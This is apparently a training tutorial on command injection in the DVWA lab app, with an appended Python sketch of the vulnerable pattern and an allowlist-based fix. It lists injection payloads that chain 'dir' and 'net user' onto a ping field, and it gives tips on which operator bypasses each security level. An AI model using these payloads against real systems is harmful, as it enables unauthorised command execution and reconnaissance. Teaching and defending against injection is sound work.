cybNg.com

DVWA Command-Injection


Execute commands on an operating system via a website


How to do Command Injection

Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, etc.) to a system shell.

💡 In simple words, command injection is possible wherever the page executes a command.

Security Low

  1. Open the command injection page on DVWA (also available in Mutillidae).
  2. First, copy and paste the given command to understand what it does.
  3. Injection is possible on this page because the IP address entered here is pinged and the output of that ping is displayed.
  4. Because ping is run as a system command, any workable command can be injected here:
     192.168.43.170 && dir

List of all command injection commands

Syntax: <IP Address> <Operator> <CMD>

CMD Name                     Security Level   Description
192.168.43.178 && dir        Low              By using this command, we can see the directory of the website.
192.168.43.178 & dir         Medium           By using this command, we can see the directory of the website.
192.168.43.178 || dir        High             By using this command, we can see the directory of the website.
192.168.43.1 && net user     Low              By using this command, we can see the administrator of the system.
192.168.43.1 & net user      Medium           By using this command, we can see the administrator of the system.
192.168.43.1 || net user     High             By using this command, we can see the administrator of the system.

Other commands such as ipconfig and help also work; just follow the syntax.

💡 Tip: Use (&&) for Low security, (&) for Medium security, (||) for High security
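
Added example (not part of the original page and not DVWA's own source): a Python sketch of the defensive counterpart to the inputs above, showing the concatenated shell string next to allowlist validation and a shell-free argument vector. The function names are hypothetical, and a Windows-style `ping -n` is assumed because the page's payloads use `dir` and `net user`.

```python
import ipaddress
import subprocess

# Inputs from the table on this page, plus one plain address (constructed sample).
PAGE_INPUTS = [
    "192.168.43.170",
    "192.168.43.178 && dir",
    "192.168.43.178 & dir",
    "192.168.43.178 || dir",
    "192.168.43.1 && net user",
]

def vulnerable_command(value):
    """The pattern the page relies on: input concatenated into a shell string."""
    return "ping " + value  # a shell treats &&, & and || as operators

def parse_target(value):
    """Return the input as a normalised IPv4 address, or None for anything else."""
    try:
        return str(ipaddress.IPv4Address(value.strip()))
    except ValueError:
        return None

def build_ping_argv(value, windows=True):
    """Allowlist validation first, then an argument vector instead of a string."""
    addr = parse_target(value)
    if addr is None:
        raise ValueError("not an IPv4 address: %r" % value)
    return ["ping", "-n" if windows else "-c", "4", addr]

def run_ping(value):
    """Run ping without a shell, so operators are never interpreted."""
    argv = build_ping_argv(value)
    return subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=30)

def audit(inputs):
    """Map each input to True (accepted as an address) or False (rejected)."""
    return {value: parse_target(value) is not None for value in inputs}

if __name__ == "__main__":
    for value, accepted in audit(PAGE_INPUTS).items():
        print("%-26s shell string: %-34r accepted: %s"
              % (value, vulnerable_command(value), accepted))
```

Validating the whole field as an address rejects every operator at every security level, which a filter that strips selected operators does not.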

